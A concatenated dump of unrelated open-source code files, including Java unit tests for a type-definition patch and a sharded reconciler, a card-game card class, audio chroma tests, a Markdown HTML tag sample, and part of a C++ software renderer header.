mapping.setStandardOrganization("TestStandardOrg");
mapping.setStandardTypeName("TestStandardTypeName");
externalStandardMappings.add(mapping);
validInstanceStatusList.add(InstanceStatus.ACTIVE);
validInstanceStatusList.add(InstanceStatus.COMPLETE);
TypeDefLink validEntityDef = new TypeDefLink();
validEntityDef.setGUID("TestSuperGUID");
validEntityDef.setName("TestSuperName");
validEntityDef.setStatus(TypeDefStatus.ACTIVE_TYPEDEF);
validEntityDef.setReplacedByTypeGUID("TestNewSuperGUID");
validEntityDef.setReplacedByTypeName("TestNewSuperName");
validEntityDefs.add(validEntityDef);
endDef1.setAttributeName("TestEndDef1");
endDef2.setAttributeName("TestEndDef2");
}
/**
* Return a filled in test object
*
* @return test object
*/
private TypeDefPatch getTestObject()
{
TypeDefPatch testObject = new TypeDefPatch();
testObject.setTypeDefGUID(typeDefGUID);
testObject.setTypeDefName(typeDefName);
testObject.setApplyToVersion(applyToVersion);
testObject.setUpdateToVersion(updateToVersion);
testObject.setNewVersionName(newVersionName);
testObject.setDescription(description);
testObject.setDescriptionGUID(descriptionGUID);
testObject.setPropertyDefinitions(typeDefAttributes);
testObject.setTypeDefOptions(typeDefOptions);
testObject.setExternalStandardMappings(externalStandardMappings);
testObject.setInitialStatus(initialStatus);
testObject.setValidInstanceStatusList(validInstanceStatusList);
testObject.setInitialStatus(initialStatus);
testObject.setValidEntityDefs(validEntityDefs);
testObject.setEndDef1(endDef1);
testObject.setEndDef2(endDef2);
return testObject;
}
/**
* Validate supplied object.
*
* @param testObject object to test
*/
private void validateObject(TypeDefPatch testObject)
{
assertEquals(testObject.getTypeDefGUID(), typeDefGUID);
assertEquals(testObject.getTypeDefName(), typeDefName);
assertEquals(testObject.getApplyToVersion(), applyToVersion);
assertEquals(testObject.getUpdateToVersion(), updateToVersion);
assertEquals(testObject.getNewVersionName(), newVersionName);
assertEquals(testObject.getDescription(), description);
assertEquals(testObject.getDescriptionGUID(), descriptionGUID);
assertEquals(testObject.getPropertyDefinitions(), typeDefAttributes);
assertEquals(testObject.getTypeDefOptions(), typeDefOptions);
assertEquals(testObject.getExternalStandardMappings(), externalStandardMappings);
assertEquals(testObject.getValidInstanceStatusList(), validInstanceStatusList);
assertEquals(testObject.getInitialStatus(), initialStatus);
assertEquals(testObject.getValidEntityDefs(), validEntityDefs);
assertEquals(testObject.getEndDef1(), endDef1);
assertEquals(testObject.getEndDef2(), endDef2);
}
/**
* Validate that the constructors set up the correct properties
*/
@Test public void testConstructors()
{
TypeDefPatch testObject = new TypeDefPatch();
assertNull(testObject.getTypeDefGUID());
assertNull(testObject.getTypeDefName());
assertTrue(testObject.getApplyToVersion() == 0);
assertTrue(testObject.getUpdateToVersion() == 0);
assertNull(testObject.getNewVersionName());
assertNull(testObject.getDescription());
assertNull(testObject.getDescriptionGUID());
assertNull(testObject.getPropertyDefinitions());
assertNull(testObject.getTypeDefOptions());
assertNull(testObject.getExternalStandardMappings());
assertNull(testObject.getValidInstanceStatusList());
assertNull(testObject.getInitialStatus());
assertNull(testObject.getValidEntityDefs());
assertNull(testObject.getEndDef1());
assertNull(testObject.getEndDef2());
TypeDefPatch anotherTestObject = getTestObject();
validateObject(new TypeDefPatch(anotherTestObject));
anotherTestObject.setValidInstanceStatusList(new ArrayList<>());
anotherTestObject.setPropertyDefinitions(new ArrayList<>());
anotherTestObject.setExternalStandardMappings(new ArrayList<>());
anotherTestObject.setTypeDefOptions(new HashMap<>());
assertNull(anotherTestObject.getValidInstanceStatusList());
assertNull(anotherTestObject.getPropertyDefinitions());
assertNull(anotherTestObject.getExternalStandardMappings());
assertNull(anotherTestObject.getTypeDefOptions());
}
/**
* Validate that an object generated from a JSON String has the same content as the object used to
* create the JSON String.
*/
@Test public void testJSON()
{
ObjectMapper objectMapper = new ObjectMapper();
String jsonString = null;
try
{
jsonString = objectMapper.writeValueAsString(getTestObject());
}
catch (Throwable exc)
{
assertTrue(false, "Exception: " + exc.getMessage());
}
try
{
validateObject(objectMapper.readValue(jsonString, TypeDefPatch.class));
}
catch (Throwable exc)
{
assertTrue(false, "Exception: " + exc.getMessage());
}
}
/**
* Test that toString is overridden.
*/
@Test public void testToString()
{
assertTrue(getTestObject().toString().contains("TypeDefPatch"));
}
/**
* Test that equals works
*/
@Test public void testEquals()
{
assertTrue(getTestObject().equals(getTestObject()));
TypeDefPatch testObject = getTestObject();
assertTrue(testObject.equals(testObject));
assertFalse(getTestObject().equals(null));
assertFalse(getTestObject().equals("A String"));
TypeDefPatch differentObject = new TypeDefPatch();
assertFalse(testObject.equals(differentObject));
differentObject = getTestObject();
differentObject.setNewVersionName("DifferentHomeId");
assertFalse(testObject.equals(differentObject));
}
/**
* Test that hashcode is consistent
*/
@Test public void testHash()
{
assertTrue(getTestObject().hashCode() == getTestObject().hashCode());
TypeDefPatch testObject = getTestObject();
TypeDefPatch anotherObject = getTestObject();
anotherObject.setTypeDefGUID("DifferentAuthor");
assertFalse(testObject.hashCode() == anotherObject.hashCode());
}
}
| 3,572 |
307 | package com.tairanchina.csp.avm.service;
import com.tairanchina.csp.avm.entity.App;
/**
* Created by hzlizx on 2018/6/25 0025
*/
public interface AppService {
/**
     * Look up an application by its tenant application ID.
     * @param tenantAppId the tenant application ID
     * @return the matching application
*/
App findAppByTenantAppId(String tenantAppId);
}
| 166 |
1,444 | <gh_stars>1000+
package mage.cards.a;
import java.util.UUID;
import mage.MageInt;
import mage.abilities.Ability;
import mage.abilities.common.EntersBattlefieldTriggeredAbility;
import mage.abilities.effects.OneShotEffect;
import mage.abilities.keyword.VigilanceAbility;
import mage.cards.CardImpl;
import mage.cards.CardSetInfo;
import mage.constants.CardType;
import mage.constants.Outcome;
import mage.constants.SubType;
import mage.game.Game;
import mage.players.Player;
import mage.players.PlayerList;
/**
*
* @author anonymous
*/
public final class ArbiterOfKnollridge extends CardImpl {
public ArbiterOfKnollridge(UUID ownerId, CardSetInfo setInfo) {
super(ownerId,setInfo,new CardType[]{CardType.CREATURE},"{6}{W}");
this.subtype.add(SubType.GIANT);
this.subtype.add(SubType.WIZARD);
this.power = new MageInt(5);
this.toughness = new MageInt(5);
// Vigilance
this.addAbility(VigilanceAbility.getInstance());
// When Arbiter of Knollridge enters the battlefield, each player's life total becomes the highest life total among all players.
this.addAbility(new EntersBattlefieldTriggeredAbility(new ArbiterOfKnollridgeEffect()));
}
private ArbiterOfKnollridge(final ArbiterOfKnollridge card) {
super(card);
}
@Override
public ArbiterOfKnollridge copy() {
return new ArbiterOfKnollridge(this);
}
}
class ArbiterOfKnollridgeEffect extends OneShotEffect {
ArbiterOfKnollridgeEffect() {
super(Outcome.GainLife);
staticText = "each player's life total becomes the highest life total among all players";
}
ArbiterOfKnollridgeEffect(final ArbiterOfKnollridgeEffect effect) {
super(effect);
}
@Override
public boolean apply(Game game, Ability source) {
int maxLife = 0;
PlayerList playerList = game.getState().getPlayersInRange(source.getControllerId(), game);
for (UUID pid : playerList) {
Player p = game.getPlayer(pid);
if (p != null) {
if (maxLife < p.getLife()) {
maxLife = p.getLife();
}
}
}
for (UUID pid : playerList) {
Player p = game.getPlayer(pid);
if (p != null) {
p.setLife(maxLife, game, source);
}
}
return true;
}
@Override
public ArbiterOfKnollridgeEffect copy() {
return new ArbiterOfKnollridgeEffect(this);
}
} | 1,020 |
1,031 |
int foofunction(int i) {
return i *= 10;
}
struct FooClass {
int foomethod(int i) {
return i += 5;
}
};
| 52 |
2,113 | <reponame>dandycheung/Markwon<gh_stars>1000+
package io.noties.markwon.app.samples.html;
import android.text.style.AbsoluteSizeSpan;
import androidx.annotation.NonNull;
import java.util.Collection;
import java.util.Collections;
import java.util.Random;
import io.noties.markwon.AbstractMarkwonPlugin;
import io.noties.markwon.Markwon;
import io.noties.markwon.MarkwonVisitor;
import io.noties.markwon.SpannableBuilder;
import io.noties.markwon.app.sample.ui.MarkwonTextViewSample;
import io.noties.markwon.html.HtmlPlugin;
import io.noties.markwon.html.HtmlTag;
import io.noties.markwon.html.MarkwonHtmlRenderer;
import io.noties.markwon.html.TagHandler;
import io.noties.markwon.sample.annotations.MarkwonArtifact;
import io.noties.markwon.sample.annotations.MarkwonSampleInfo;
import io.noties.markwon.sample.annotations.Tag;
@MarkwonSampleInfo(
id = "20200630114923",
title = "Random char size HTML tag",
description = "Implementation of a custom HTML tag handler " +
"that assigns each character a random size",
artifacts = MarkwonArtifact.HTML,
tags = {Tag.rendering, Tag.span, Tag.html}
)
public class HtmlRandomCharSize extends MarkwonTextViewSample {
@Override
public void render() {
final String md = "" +
"<random-char-size>\n" +
"This message should have a jumpy feeling because of different sizes of characters\n" +
"</random-char-size>\n\n";
final Markwon markwon = Markwon.builder(context)
.usePlugin(HtmlPlugin.create())
.usePlugin(new AbstractMarkwonPlugin() {
@Override
public void configure(@NonNull Registry registry) {
registry.require(HtmlPlugin.class, htmlPlugin -> htmlPlugin
.addHandler(new RandomCharSize(new Random(42L), textView.getTextSize())));
}
})
.build();
markwon.setMarkdown(textView, md);
}
}
class RandomCharSize extends TagHandler {
private final Random random;
private final float base;
RandomCharSize(@NonNull Random random, float base) {
this.random = random;
this.base = base;
}
@Override
public void handle(
@NonNull MarkwonVisitor visitor,
@NonNull MarkwonHtmlRenderer renderer,
@NonNull HtmlTag tag) {
final SpannableBuilder builder = visitor.builder();
// text content is already added, we should only apply spans
for (int i = tag.start(), end = tag.end(); i < end; i++) {
final int size = (int) (base * (random.nextFloat() + 0.5F) + 0.5F);
builder.setSpan(new AbsoluteSizeSpan(size, false), i, i + 1);
}
}
@NonNull
@Override
public Collection<String> supportedTags() {
return Collections.singleton("random-char-size");
}
}
| 952 |
582 | <reponame>CyberSinh/chromaprint<gh_stars>100-1000
#include <vector>
#include <algorithm>
#include <gtest/gtest.h>
#include "fft_frame.h"
#include "chroma.h"
using namespace chromaprint;
class FeatureVectorBuffer : public FeatureVectorConsumer
{
public:
void Consume(std::vector<double> &features)
{
m_features = features;
}
std::vector<double> m_features;
};
TEST(Chroma, NormalA) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
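	// bin 113 of a 256-point frame at 1000 Hz is 113 * 1000 / 256 ~= 441.4 Hz, i.e. concert A (440 Hz)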
frame.data()[113] = 1.0;
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
1.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
TEST(Chroma, NormalGSharp) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
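	// bin 112 of a 256-point frame at 1000 Hz is 112 * 1000 / 256 = 437.5 Hz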
frame.data()[112] = 1.0;
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 1.0,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
TEST(Chroma, NormalB) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
frame.data()[64] = 1.0; // 250 Hz
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
0.0, 0.0, 1.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
TEST(Chroma, InterpolatedB) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
chroma.set_interpolate(true);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
frame.data()[64] = 1.0;
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
0.0, 0.286905, 0.713095, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
TEST(Chroma, InterpolatedA) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
chroma.set_interpolate(true);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
frame.data()[113] = 1.0;
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
0.555242, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.444758,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
TEST(Chroma, InterpolatedGSharp) {
FeatureVectorBuffer buffer;
Chroma chroma(10, 510, 256, 1000, &buffer);
chroma.set_interpolate(true);
FFTFrame frame(128);
std::fill(frame.data(), frame.data() + frame.size(), 0.0);
frame.data()[112] = 1.0;
chroma.Consume(frame);
ASSERT_EQ(12, buffer.m_features.size());
double expected_features[12] = {
0.401354, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.598646,
};
for (int i = 0; i < 12; i++) {
EXPECT_NEAR(expected_features[i], buffer.m_features[i], 0.0001) << "Different value at index " << i;
}
}
| 1,615 |
339 | <reponame>aliteff/ddd-strategic-design-spring-boot
package com.innoq.mploed.ddd.customercontact;
import io.prometheus.client.spring.boot.EnablePrometheusEndpoint;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
@EnablePrometheusEndpoint
public class CustomerContactSpringBootApplication {
public static void main(String[] args) throws InterruptedException {
SpringApplication.run(CustomerContactSpringBootApplication.class, args);
}
}
| 161 |
1,137 | <reponame>Q-Y-H/fitlog<filename>tests/fastgit/test_fastgit.py<gh_stars>1000+
import unittest
import os
import shutil
from fitlog.fastgit import committer
class TextExample(unittest.TestCase):
    def setUp(self):  # setUp does the preparation work, e.g. creating test data.
os.mkdir('testArea')
def test_init(self):
ret = committer.init_project('testArea/test_pj', git=False)
self.assertEqual(ret, 0)
    def tearDown(self):  # tearDown cleans up the test fixtures once the test has finished.
shutil.rmtree('testArea', ignore_errors=True)
# Basic reference: https://docs.python.org/zh-cn/3/library/unittest.html
# mock offers more possibilities: https://docs.python.org/zh-cn/3/library/unittest.mock.html
| 381 |
313 | <gh_stars>100-1000
/*
* Copyright 2021 Netflix, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netflix.titus.common.framework.simplereconciler.internal;
import java.util.Iterator;
import java.util.List;
import com.google.common.base.Preconditions;
import com.netflix.titus.common.framework.simplereconciler.SimpleReconcilerEvent;
import com.netflix.titus.common.util.closeable.CloseableReference;
import org.junit.After;
import org.junit.Test;
import reactor.core.publisher.Mono;
import reactor.core.scheduler.Scheduler;
import reactor.core.scheduler.Schedulers;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.fail;
public class ShardedManyReconcilerTest {
private final StubManyReconciler<String> shard1 = new StubManyReconciler<>();
private final StubManyReconciler<String> shard2 = new StubManyReconciler<>();
private final CloseableReference<Scheduler> notificationSchedulerRef = CloseableReference.referenceOf(
Schedulers.newSingle("reconciler-notification-junit", true), Scheduler::dispose
);
private final ShardedManyReconciler<String> reconciler = new ShardedManyReconciler<>(
2,
id -> id.contains("shard1") ? 0 : 1,
shardIdx -> {
Preconditions.checkArgument(shardIdx < 2);
return shardIdx == 0 ? shard1 : shard2;
},
notificationSchedulerRef
);
@After
public void tearDown() throws Exception {
reconciler.close().block();
}
@Test(timeout = 30_000)
public void testAdd() {
Iterator<List<SimpleReconcilerEvent<String>>> eventsIt = reconciler.changes("junit").toIterable().iterator();
assertThat(eventsIt.hasNext()).isTrue();
assertThat(eventsIt.next()).isEmpty();
// Shard1
reconciler.add("abc_shard1", "value1").block();
expectEvent(eventsIt, SimpleReconcilerEvent.Kind.Added, "abc_shard1", "value1");
        assertThat(shard1.findById("abc_shard1")).isNotEmpty();
        assertThat(shard2.getAll()).isEmpty();
        // Shard2
        reconciler.add("abc_shard2", "value2").block();
        expectEvent(eventsIt, SimpleReconcilerEvent.Kind.Added, "abc_shard2", "value2");
        assertThat(shard1.getAll()).hasSize(1);
        assertThat(shard2.findById("abc_shard2")).isNotEmpty();
}
@Test(timeout = 30_000)
public void testApplyChange() {
Iterator<List<SimpleReconcilerEvent<String>>> eventIt = addData("1@shard1", "2@shard1", "3@shard2", "4@shard2");
reconciler.apply("1@shard1", data -> Mono.just("1")).block();
expectEvent(eventIt, SimpleReconcilerEvent.Kind.Updated, "1@shard1", "1");
assertThat(reconciler.getAll()).containsEntry("1@shard1", "1");
reconciler.apply("4@shard2", data -> Mono.just("2")).block();
expectEvent(eventIt, SimpleReconcilerEvent.Kind.Updated, "4@shard2", "2");
}
@Test(timeout = 30_000)
public void testRemove() {
        Iterator<List<SimpleReconcilerEvent<String>>> eventsIt = addData("1@shard1", "2@shard1", "3@shard2", "4@shard2");
        reconciler.remove("1@shard1").block();
        expectEvent(eventsIt, SimpleReconcilerEvent.Kind.Removed, "1@shard1", "");
        reconciler.remove("3@shard2").block();
        expectEvent(eventsIt, SimpleReconcilerEvent.Kind.Removed, "3@shard2", "");
assertThat(shard1.getAll()).hasSize(1).containsKey("2@shard1");
assertThat(shard2.getAll()).hasSize(1).containsKey("4@shard2");
}
@Test(timeout = 30_000)
public void testGetAllAndSize() {
addData("1@shard1", "2@shard1", "3@shard2", "4@shard2");
assertThat(reconciler.getAll()).containsKeys("1@shard1", "2@shard1", "3@shard2", "4@shard2");
assertThat(reconciler.size()).isEqualTo(4);
}
@Test(timeout = 30_000)
public void testFindById() {
addData("1@shard1", "2@shard1", "3@shard2", "4@shard2");
assertThat(reconciler.findById("1@shard1")).isNotEmpty();
assertThat(reconciler.findById("4@shard2")).isNotEmpty();
assertThat(reconciler.findById("wrongId")).isEmpty();
}
@Test
public void testClose() {
reconciler.close().block();
try {
reconciler.add("abc", "v").block();
fail("Expected add failure");
} catch (Exception e) {
assertThat(e).isInstanceOf(IllegalStateException.class);
assertThat(e.getMessage()).contains("Sharded reconciler closed");
}
}
private Iterator<List<SimpleReconcilerEvent<String>>> addData(String... ids) {
for (String id : ids) {
reconciler.add(id, "").block();
}
Iterator<List<SimpleReconcilerEvent<String>>> eventsIt = reconciler.changes("junit").toIterable().iterator();
assertThat(eventsIt.hasNext()).isTrue();
List<SimpleReconcilerEvent<String>> next = eventsIt.next();
assertThat(next).hasSize(ids.length);
return eventsIt;
}
private void expectEvent(Iterator<List<SimpleReconcilerEvent<String>>> eventsIt,
SimpleReconcilerEvent.Kind kind, String id, String value) {
assertThat(eventsIt.hasNext()).isTrue();
List<SimpleReconcilerEvent<String>> next = eventsIt.next();
assertThat(next).hasSize(1);
assertThat(next.get(0).getKind()).isEqualTo(kind);
assertThat(next.get(0).getId()).isEqualTo(id);
assertThat(next.get(0).getData()).isEqualTo(value);
}
} | 2,485 |
369 | /*
* Eos - A 3D Morphable Model fitting library written in modern C++11/14.
*
* File: include/eos/render/render.hpp
*
* Copyright 2014, 2015 <NAME>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#pragma once
#ifndef RENDER_HPP_
#define RENDER_HPP_
#include "eos/render/detail/render_detail.hpp"
#include "eos/render/utils.hpp"
#include "opencv2/core/core.hpp"
#ifdef WIN32
#define BOOST_ALL_DYN_LINK // Link against the dynamic boost lib. Seems to be necessary because we use /MD, i.e. link to the dynamic CRT.
#define BOOST_ALL_NO_LIB // Don't use the automatic library linking by boost with VS2010 (#pragma ...). Instead, we specify everything in cmake.
#endif
#include "boost/optional.hpp"
#include <array>
#include <vector>
#include <memory>
namespace eos {
namespace render {
/**
* This file implements a software renderer conforming to OpenGL conventions. The
* following are implementation notes, mostly for reference, or as a reminder of
* what exactly is going on. Don't try to understand them :-)
*
* The renderer was initially based on code by <NAME>
 * (http://maxest.gct-game.net/content/vainmoinen/index.html); however, it has since
 * been completely rewritten. Still, I'd like to thank him for making his code
* available and bravely answering my questions via email.
*
* Coordinate systems:
* When specifying the vertices: +x = right, +y = up, we look into -z.
* So z = 0.5 is in front of 0.0.
* Z-Buffer:
*
* Shirley: Specify n and f with negative values. which makes sense b/c the points
* are along the -z axis.
* Consequences: notably: orthogonal(2, 3): Shirley has denominator (n-f).
* In what space are the points in Shirley after this?
* OGL: We're in the orthographic viewing volume looking down -z.
* However, n and f are specified positive.
* B/c the 3D points in front of the cam obviously still have negative z values, the
* z-value is negated. So: n = 0.1, f = 100; With the given OpenGL ortho matrix,
* it means a point on the near-plane which will have z = -0.1 will land up
* on z_clip (which equals z_ndc with ortho because w=1) = -1, and a point on
* the far plane z = -100 will have z_ndc = +1.
*
* That's also why in the perspective case, w_clip is set to -z_eye because
* to project a point the formula is $x_p = (-n * x_e)/z_e$ (because our near is
* specified with positive values, but the near-plane is _really_ at -n); but now we
* just move the minus-sign to the denominator, $x_p = (n * x_e)/-z_e$, so in the projection matrix we can use
* the (positive) n and f values and afterwards we divide by w = -z_e.
*
* http://www.songho.ca/opengl/gl_projectionmatrix.html
*
* Random notes:
* clip-space: after applying the projection matrix.
* ndc: after division by w
* NDC cube: the range of x-coordinate from [l, r] to [-1, 1], the y-coordinate from [b, t] to [-1, 1] and the z-coordinate from [n, f] to [-1, 1].
*
* Note/Todo: I read that in screen space, OpenGL transform the z-values again to be between 0 and 1?
*
* In contrast to OGL, this renderer doesn't have state, it's just a function that gets called with all
* necessary parameters. It's easiest for our purposes.
*
* Here's the whole rendering pipeline:
* Model space
* -> model transforms
* World space
* -> camera (view/eye) transform
* View / eye / camera space ("truncated pyramid frustum". In case of ortho, it's already rectangular.)
* -> perspective/ortho projection
* Clip coords (x_c, y_c, z_c, w_c); the z-axis is flipped now. z [z=-n, z=-f] is mapped to [-1, +1] in case of ortho, but not yet in case of persp (it's also flipped though), but the not-[-1,1]-range is fine as we test against w_c. I.e. the larger the z-value, the further back we are.
* Do frustum culling (clipping) here. Test the clip-coords with w_c, and discard if a tri is completely outside.
* Of the partially visible tris, clip them against the near-plane and construct the visible part of the triangle.
* We only do this for the near-plane here. Clipping to the near plane must be done here because after w-division triangles crossing it would get distorted.
* "Then, OpenGL will reconstruct the edges of the polygon where clipping occurs."
* -> Then divide by the w component of the clip coordinates
* NDC. (now only 3D vectors: [x_ndc, y_ndc, z_ndc]). nearest points have z=-1, points on far plane have z=+1.
* -> window transform. (also, OGL does some more to the z-buffer?)
* Screen / window space
* Directly after window-transform (still processing triangles), do backface culling with areVerticesCCWInScreenSpace()
* Directly afterwards we calculate the triangle's bounding box and clip x/y (screen) against 0 and the viewport width/height.
* Rasterising: Clipping against the far plane here by only drawing those pixels with a z-value of <= 1.0f.
*
* OGL: "both clipping (frustum culling) and NDC transformations are integrated into GL_PROJECTION matrix"
*
* Note: In both the ortho and persp case, points at z=-n end up at -1, z=-f at +1. In case of persp proj., this happens only after the divide by w.
*/
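/*
 * Illustrative sketch (not part of the original library): the clip -> NDC ->
 * window mapping described above, applied to a single vertex. The y-flip is an
 * assumption matching image coordinates, where rows grow downwards.
 */
inline cv::Vec3f clip_to_window_example(const cv::Vec4f& clip, int viewport_width, int viewport_height)
{
	// Perspective divide: clip -> NDC. For perspective projections w_c == -z_eye,
	// so this performs the actual projection; for ortho, w_c == 1 and it is a no-op.
	const float x_ndc = clip[0] / clip[3];
	const float y_ndc = clip[1] / clip[3];
	const float z_ndc = clip[2] / clip[3];
	// Window transform: map x/y from [-1, 1] to pixel coordinates; z_ndc is kept
	// for the depth test ([-1, 1], near to far).
	const float x_w = (x_ndc + 1.0f) * 0.5f * viewport_width;
	const float y_w = (1.0f - y_ndc) * 0.5f * viewport_height;
	return cv::Vec3f(x_w, y_w, z_ndc);
}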
/**
* Renders the given mesh onto a 2D image using 4x4 model-view and
* projection matrices. Conforms to OpenGL conventions.
*
* @param[in] mesh A 3D mesh.
* @param[in] model_view_matrix A 4x4 OpenGL model-view matrix.
* @param[in] projection_matrix A 4x4 orthographic or perspective OpenGL projection matrix.
* @param[in] viewport_width Screen width.
* @param[in] viewport_height Screen height.
* @param[in] texture An optional texture map (TODO: Not optional yet!).
* @param[in] enable_backface_culling Whether the renderer should perform backface culling. If true, only draw triangles with vertices ordered CCW in screen-space.
 * @param[in] enable_near_clipping Whether to clip triangles against the near plane.
 * @param[in] enable_far_clipping Whether to discard pixels that lie beyond the far plane.
* @return A pair with the colourbuffer as its first element and the depthbuffer as the second element.
*/
std::pair<cv::Mat, cv::Mat> render(Mesh mesh, cv::Mat model_view_matrix, cv::Mat projection_matrix, int viewport_width, int viewport_height, const Texture& texture, bool enable_backface_culling = false, bool enable_near_clipping = true, bool enable_far_clipping = true)
{
// Some internal documentation / old todos or notes:
// maybe change and pass depthBuffer as an optional arg (&?), because usually we never need it outside the renderer. Or maybe even a getDepthBuffer().
// modelViewMatrix goes to eye-space (camera space), projection does ortho or perspective proj.
// bool enable_texturing = false; Maybe re-add later, not sure
// take a cv::Mat texture instead and convert to Texture internally? no, we don't want to recreate mipmap levels on each render() call.
assert(mesh.vertices.size() == mesh.colors.size() || mesh.colors.empty()); // The number of vertices has to be equal for both shape and colour, or, alternatively, it has to be a shape-only model.
assert(mesh.vertices.size() == mesh.texcoords.size() || mesh.texcoords.empty()); // same for the texcoords
// another assert: If cv::Mat texture != empty, then we need texcoords?
using cv::Mat;
using std::vector;
Mat colourbuffer = Mat::zeros(viewport_height, viewport_width, CV_8UC4); // make sure it's CV_8UC4?
Mat depthbuffer = std::numeric_limits<float>::max() * Mat::ones(viewport_height, viewport_width, CV_64FC1);
// Vertex shader:
//processedVertex = shade(Vertex); // processedVertex : pos, col, tex, texweight
// Assemble the vertices, project to clip space, and store as detail::Vertex (the internal representation):
vector<detail::Vertex> clipspace_vertices;
clipspace_vertices.reserve(mesh.vertices.size());
for (int i = 0; i < mesh.vertices.size(); ++i) { // "previously": mesh.vertex
Mat clipspace_coords = projection_matrix * model_view_matrix * Mat(mesh.vertices[i]);
cv::Vec3f vertex_colour;
if (mesh.colors.empty()) {
vertex_colour = cv::Vec3f(0.5f, 0.5f, 0.5f);
}
else {
vertex_colour = mesh.colors[i];
}
clipspace_vertices.push_back(detail::Vertex(clipspace_coords, vertex_colour, mesh.texcoords[i]));
}
// All vertices are in clip-space now.
// Prepare the rasterisation stage.
// For every vertex/tri:
vector<detail::TriangleToRasterize> triangles_to_raster;
for (const auto& tri_indices : mesh.tvi) {
// Todo: Split this whole stuff up. Make a "clip" function, ... rename "processProspective..".. what is "process"... get rid of "continue;"-stuff by moving stuff inside process...
// classify vertices visibility with respect to the planes of the view frustum
// we're in clip-coords (NDC), so just check if outside [-1, 1] x ...
// Actually we're in clip-coords and it's not the same as NDC. We're only in NDC after the division by w.
// We should do the clipping in clip-coords though. See http://www.songho.ca/opengl/gl_projectionmatrix.html for more details.
// However, when comparing against w_c below, we might run into the trouble of the sign again in the affine case.
// 'w' is always positive, as it is -z_camspace, and all z_camspace are negative.
unsigned char visibility_bits[3];
for (unsigned char k = 0; k < 3; k++)
{
visibility_bits[k] = 0;
float x_cc = clipspace_vertices[tri_indices[k]].position[0];
float y_cc = clipspace_vertices[tri_indices[k]].position[1];
float z_cc = clipspace_vertices[tri_indices[k]].position[2];
float w_cc = clipspace_vertices[tri_indices[k]].position[3];
if (x_cc < -w_cc) // true if outside of view frustum. False if on or inside the plane.
visibility_bits[k] |= 1; // set bit if outside of frustum
if (x_cc > w_cc)
visibility_bits[k] |= 2;
if (y_cc < -w_cc)
visibility_bits[k] |= 4;
if (y_cc > w_cc)
visibility_bits[k] |= 8;
if (enable_near_clipping && z_cc < -w_cc) // near plane frustum clipping
visibility_bits[k] |= 16;
if (enable_far_clipping && z_cc > w_cc) // far plane frustum clipping
visibility_bits[k] |= 32;
} // if all bits are 0, then it's inside the frustum
// all vertices are not visible - reject the triangle.
if ((visibility_bits[0] & visibility_bits[1] & visibility_bits[2]) > 0)
{
continue;
}
// all vertices are visible - pass the whole triangle to the rasterizer. = All bits of all 3 triangles are 0.
if ((visibility_bits[0] | visibility_bits[1] | visibility_bits[2]) == 0)
{
boost::optional<detail::TriangleToRasterize> t = detail::process_prospective_tri(clipspace_vertices[tri_indices[0]], clipspace_vertices[tri_indices[1]], clipspace_vertices[tri_indices[2]], viewport_width, viewport_height, enable_backface_culling);
if (t) {
triangles_to_raster.push_back(*t);
}
continue;
}
// at this moment the triangle is known to be intersecting one of the view frustum's planes
std::vector<detail::Vertex> vertices;
